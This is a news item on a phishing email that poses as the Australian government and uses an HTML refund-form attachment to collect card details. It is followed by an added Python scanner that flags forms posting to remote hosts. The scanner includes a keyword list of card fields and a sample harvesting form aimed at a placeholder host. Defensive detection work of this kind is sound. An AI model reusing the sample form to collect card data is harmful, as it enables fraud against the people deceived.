Aussie taxpayers targeted in refund scam

According to Paul Ducklin, head of technology, Asia Pacific, with Sophos, scammers are trying to convince Aussie taxpayers that their refunds are ready, despite the fact that the tax year ends in June.

But apparently scammers are not aware of the subtleties of the Australian tax season. They are sending an email now saying that taxpayers are due refunds. The email says: “To access your tax refund, please follow the steps below: download the Tax Refund Form attached to this email, open it in a browser, and follow the instructions on your screen.” The email is signed, “the Australian government.”

Instead of asking recipients to click on a link, the email asks that a form be downloaded and opened in a browser. The form asks for name, date of birth, address, and of course credit card number, expiration date, and card verification number.

You are then directed to a button marked “continue”, which leads to a hacked server in the US.

“You might think that a web page which presents a form from one location (in this case, your hard disk) but submits the results to a completely different site would raise a warning, at least at an Internet Explorer security setting of ‘High’. But it does not, presumably because this behaviour is considered unexceptional on legitimate sites”, Ducklin explained in a blog.
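A defender-side check suggested by the behaviour Ducklin describes, as an added example that is not taken from the article or from Sophos: it parses an HTML attachment and flags any form that posts to a network host rather than back to the page itself, listing the card-related fields the form collects. The field-name list and the sample attachment (with a placeholder host) are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Field names typical of card-harvesting forms; this list is an assumption
# for the example, not taken from the article.
SENSITIVE_FIELDS = {"card", "cc", "cvv", "cvc", "expiry", "dob", "birth"}


class FormScanner(HTMLParser):
    """Collect each <form> action and the input names inside it."""

    def __init__(self):
        super().__init__()
        self.forms = []        # list of {"action": str, "fields": [str]}
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "fields": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["fields"].append((a.get("name") or "").lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def is_remote(action):
    """True if the form submits to a network host instead of back to the page."""
    u = urlsplit(action)
    return u.scheme in ("http", "https") and bool(u.netloc)


def scan_attachment(html):
    """Report forms in a locally opened attachment that post to a remote site."""
    parser = FormScanner()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        if not is_remote(form["action"]):
            continue
        hits = sorted({n for n in form["fields"]
                       if any(k in n for k in SENSITIVE_FIELDS)})
        findings.append({"host": urlsplit(form["action"]).netloc,
                         "sensitive_fields": hits})
    return findings


# Constructed sample attachment; the host is a placeholder, not a real indicator.
SAMPLE = """<html><body><h1>Tax Refund Form</h1>
<form method="post" action="http://compromised-host.example/submit.php">
<input name="fullname"><input name="dob"><input name="address">
<input name="card_number"><input name="card_expiry"><input name="cvv">
<input type="submit" value="continue">
</form></body></html>"""

if __name__ == "__main__":
    for hit in scan_attachment(SAMPLE):
        print(f"form posts to {hit['host']}; fields: {hit['sensitive_fields']}")
```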
